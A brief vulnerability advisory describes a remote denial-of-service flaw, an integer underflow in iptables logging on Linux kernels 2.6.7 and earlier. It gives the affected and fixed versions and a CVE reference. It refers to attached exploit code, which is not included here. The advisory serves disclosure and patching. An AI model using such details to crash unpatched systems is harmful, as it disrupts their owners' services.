IPTables Log Integer Underflow (PoC)
------------------------------------------------------------------------
SUMMARY
An integer underflow in the firewall logging rules for iptables in Linux
before version 2.6.8 allows remote attackers to cause a denial of service
(application crash) via a malformed IP packet. The attached exploit code
can be used to test your system for the mentioned vulnerability.
DETAILS
Vulnerable Systems:
* Linux Kernel version 2.6.7 and prior
Immune Systems:
* Linux Kernel version 2.6.8 or newer
CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0816>
